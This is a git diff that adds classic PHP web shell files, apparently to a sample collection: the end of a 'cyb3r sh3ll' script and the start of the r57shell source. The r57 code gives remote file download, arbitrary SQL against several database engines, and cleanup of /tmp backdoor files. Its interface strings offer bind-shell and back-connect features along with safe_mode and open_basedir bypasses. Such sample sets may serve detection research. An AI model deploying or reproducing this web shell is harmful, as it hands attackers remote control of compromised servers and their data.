+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". + +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". + +"Wq/NknbbSgAAOw==", + +"ext_hpp"=> + +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". + +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". + +"UqUagnbLdZa+YFcCADs=", + +"ext_htaccess"=> + +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". + +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". + +"AAA7", + +"ext_html"=> + +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". + +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". + +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". + +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". + +"ADs=", + +"ext_jpg"=> + +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". + +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". + +"FxEAOw==", + +"ext_js"=> + +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". + +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". + +"a00AjYYBbc/o9HjNniUAADs=", + +"ext_lnk"=> + +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". + +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". + +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". + +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". + +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". + +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". + +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". + +"ADs=", + +"ext_log"=> + +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". + +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", + +"ext_php"=> + +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". + +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", + +"ext_pl"=> + +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". + +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", + +"ext_swf"=> + +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". + +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". + +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". + +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". + +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", + +"ext_tar"=> + +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". + +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". + +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". + +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". + +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". + +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". + +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". + +"u4tLAgEAOw==", + +"ext_txt"=> + +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". + +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". + +"UpPWG3Ig6Hq/XmRjuZwkAAA7", + +"ext_wri"=> + +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". + +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", + +"ext_xml"=> + +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". + +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". + +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". + +"IQA7" + + ); + + //For simple size- and speed-optimization. + + $imgequals = array( + + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + + "ext_html"=>array("ext_html","ext_htm"), + + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + + "ext_lnk"=>array("ext_lnk","ext_url"), + + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + + "ext_doc"=>array("ext_doc","ext_dot"), + + "ext_js"=>array("ext_js","ext_vbs"), + + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + + "ext_wri"=>array("ext_wri","ext_rtf"), + + "ext_swf"=>array("ext_swf","ext_fla"), + + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + + ); + + if (!$getall) + + { + + header("Content-type: image/gif"); + + header("Cache-control: public"); + + header("Cache-control: max-age=".(60*60*24*7)); + + header("Last-Modified: ".date("r",filemtime(__FILE__))); + + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + + if (empty($images[$img])) {$img = "small_unk";} + + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + + echo base64_decode($images[$img]); + + } + + else + + { + + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
");}}}} + + natsort($images); + + $k = array_keys($images); + + echo "
"; + + foreach ($k as $u) {echo $u.":
";} + + echo "
"; + + } + + exit; + +} + +?> + +
+ +
(C) Copyright cyb3r 9l4d!470r [All rights reserved]
Greetz to : r45c4l bro, r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot.
--[ cyb3r sh3ll v. Coded by cyb3r 9l4d!470r (cyber gladiator) | h4cK2b0yZz.. | Generation time: ]--
+
+ + + \ No newline at end of file diff --git a/data/samples/classic/r57.php b/data/samples/classic/r57.php new file mode 100644 index 0000000..accc1fa --- /dev/null +++ b/data/samples/classic/r57.php @@ -0,0 +1,2302 @@ +$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) + { + header('WWW-Authenticate: Basic realm="r57shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("r57shell : Access Denied"); + } +} +$head = ' + + +r57shell + + + +'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +if(isset($_GET['img'])&&!empty($_GET['img'])) + { + $images = array(); + $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; + $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; + @ob_clean(); + header("Content-type: image/gif"); + echo base64_decode($images[$_GET['img']]); + die(); + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "Query#".$num." : ".htmlspecialchars($query)."
"; + $res = @mysql_query($query,$db); + $error = @mysql_error($db); + if($error) { echo "
Error : ".$error."

"; } + else { + if (@mysql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mysql_fetch_assoc($res))) + { + $keys = @implode("  ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("  ",$values); + $sql2 .= " ".$values." "; + } + echo ""; + $sql = ""; + $sql .= $sql2; + echo $sql; + echo "
 ".$keys." 

"; + } + else { if(($rows = @mysql_affected_rows($db))>=0) { echo "
affected rows : ".$rows."

"; } } + } + @mysql_free_result($res); + } + } + @mysql_close($db); + } + else echo "
Can't connect to MySQL server
"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "Query#".$num." : ".htmlspecialchars($query)."
"; + $res = @mssql_query($query,$db); + if (@mssql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mssql_fetch_assoc($res))) + { + $keys = @implode("  ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("  ",$values); + $sql2 .= " ".$values." "; + } + echo ""; + $sql = ""; + $sql .= $sql2; + echo $sql; + echo "
 ".$keys." 

"; + } + /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "
affected rows : ".$rows."

"; } else { echo "
Error : ".$error."

"; }} */ + @mssql_free_result($res); + } + } + @mssql_close($db); + } + else echo "
Can't connect to MSSQL server
"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "Query#".$num." : ".htmlspecialchars($query)."
"; + $res = @pg_query($db,$query); + $error = @pg_errormessage($db); + if($error) { echo "
Error : ".$error."

"; } + else { + if (@pg_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @pg_fetch_assoc($res))) + { + $keys = @implode("  ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("  ",$values); + $sql2 .= " ".$values." "; + } + echo ""; + $sql = ""; + $sql .= $sql2; + echo $sql; + echo "
 ".$keys." 

"; + } + else { if(($rows = @pg_affected_rows($res))>=0) { echo "
affected rows : ".$rows."

"; } } + } + @pg_free_result($res); + } + } + @pg_close($db); + } + else echo "
Can't connect to PostgreSQL server
"; + break; + case 'Oracle': + $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); + if(($error = @ocierror())) { echo "
Can't connect to Oracle server.
".$error['message']."
"; } + else + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5) { + echo "Query#".$num." : ".htmlspecialchars($query)."
"; + $stat = @ociparse($db, $query); + @ociexecute($stat); + if(($error = @ocierror())) { echo "
Error : ".$error['message']."

"; } + else + { + $rowcount = @ocirowcount($stat); + if($rowcount != 0) {echo "
affected rows : ".$rowcount."

";} + else { + echo ""; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ""; } + echo ""; + while(ocifetch($stat)) + { + echo ""; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ""; } + echo ""; + } + echo "
 ".htmlspecialchars(@ocicolumnname($stat, $j))." 
 ".htmlspecialchars(@ociresult($stat, $j))." 

"; + } + @ocifreestatement($stat); + } + } + } + @ocilogoff($db); + } + break; + } + echo "
"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "



"; + echo "
"; + echo "
[ BACK ]
"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return 'no value'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '', true); + return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '', ''; + foreach (@ini_get_all() as $key=>$value) + { + $r .= ''; + } + echo $r; + echo '
Directive
Local Value
Master Value
'.ws(3).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'
'; + } +echo "
[ BACK ]
"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '
CPU
'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; + echo "
[ BACK ]
"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '
MEMORY
'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; + echo "
[ BACK ]
"; + die(); + } +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'???????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? ??? ??????', +'ru_text53'=>'?????? ? ?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? ??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text77'=>'???????? ????????? ???? ??????', +'ru_text78'=>'?????????? ???????', +'ru_text79'=>'?????????? ???????', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +'ru_text86'=>'?????????? ????? ? ???????', +'ru_butt14'=>'???????', +'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????', +'ru_text88'=>'FTP-??????:????', +'ru_text89'=>'???? ?? ftp ???????', +'ru_text90'=>'????? ????????', +'ru_text91'=>'???????????? ?', +'ru_text92'=>'??? ?????????', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-????????', +'ru_text95'=>'?????? ?????????????', +'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', +'ru_text97'=>'????????? ??????????: ', +'ru_text98'=>'??????? ???????????: ', +'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', +'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', +'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', +'ru_text102'=>'?????', +'ru_text103'=>'???????? ??????', +'ru_text104'=>'???????? ????? ?? ???????? ????', +'ru_text105'=>'????', +'ru_text106'=>'??', +'ru_text107'=>'????', +'ru_butt15'=>'?????????', +'ru_text108'=>'????? ??????', +'ru_text109'=>'????????', +'ru_text110'=>'??????????', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', 